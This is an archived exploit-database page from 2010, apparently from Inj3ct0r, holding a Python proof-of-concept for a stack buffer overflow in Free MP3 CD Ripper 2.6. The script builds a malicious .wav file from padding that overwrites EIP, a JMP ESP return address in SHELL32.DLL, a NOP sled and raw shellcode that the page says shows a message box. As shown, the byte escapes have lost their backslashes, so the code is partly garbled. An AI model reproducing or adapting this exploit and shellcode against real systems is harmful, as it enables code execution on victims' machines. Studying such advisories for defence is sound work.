Home / os / win7

Free MP3 CD Ripper 2.6 (.wav/.ogg/.flac/.ape) Exploit

Posted on 07 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Free MP3 CD Ripper 2.6 (.wav/.ogg/.flac/.ape) Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== Free MP3 CD Ripper 2.6 (.wav/.ogg/.flac/.ape) Exploit ===================================================== # Exploit Title: Free MP3 CD Ripper 2.6 (.wav , .ogg , .flac , .ape) # Date: 7 / 8 / 2010 # Author: Oh Yaw Theng # Software Link: http://www.exploit-db.com/application/12012/ # Version: 2.6 # Tested on: Windows XP SP 2 # CVE : N / A #!/usr/bin/python # User can replace the .wav extension below with any extensions specify above filename = &quot;crash.wav&quot; # 4112 bytes are needed before overwriting EIP register junk = &quot;x41&quot; * 4112 # JMP ESP at SHELL32.DLL ret = &quot;x65x82xA5x7C&quot; # 7C A5 82 65 FFE4 JMP ESP # This piece of shellcode will pop up a messagebox 0.o !! wtf ... shellcode = (&quot;xFCx33xD2xB2x30x64xFFx32x5Ax8B&quot; &quot;x52x0Cx8Bx52x14x8Bx72x28x33xC9&quot; &quot;xB1x18x33xFFx33xC0xACx3Cx61x7C&quot; &quot;x02x2Cx20xC1xCFx0Dx03xF8xE2xF0&quot; &quot;x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B&quot; &quot;x12x75xDAx8Bx53x3Cx03xD3xFFx72&quot; &quot;x34x8Bx52x78x03xD3x8Bx72x20x03&quot; &quot;xF3x33xC9x41xADx03xC3x81x38x47&quot; &quot;x65x74x50x75xF4x81x78x04x72x6F&quot; &quot;x63x41x75xEBx81x78x08x64x64x72&quot; &quot;x65x75xE2x49x8Bx72x24x03xF3x66&quot; &quot;x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14&quot; &quot;x8Ex03xD3x52x33xFFx57x68x61x72&quot; &quot;x79x41x68x4Cx69x62x72x68x4Cx6F&quot; &quot;x61x64x54x53xFFxD2x68x33x32x01&quot; &quot;x01x66x89x7Cx24x02x68x75x73x65&quot; &quot;x72x54xFFxD0x68x6Fx78x41x01x8B&quot; &quot;xDFx88x5Cx24x03x68x61x67x65x42&quot; &quot;x68x4Dx65x73x73x54x50xFFx54x24&quot; &quot;x2Cx57x68x4Fx5Fx6Fx21x8BxDCx57&quot; &quot;x53x53x57xFFxD0x68x65x73x73x01&quot; &quot;x8BxDFx88x5Cx24x03x68x50x72x6F&quot; &quot;x63x68x45x78x69x74x54xFFx74x24&quot; &quot;x40xFFx54x24x40x57xFFxD0&quot;) # Building malicious data exploit = junk + ret + &quot;x90&quot; * 5 + shellcode # left 265 for shellcode textfile = open(filename,'w') textfile.write(exploit) textfile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP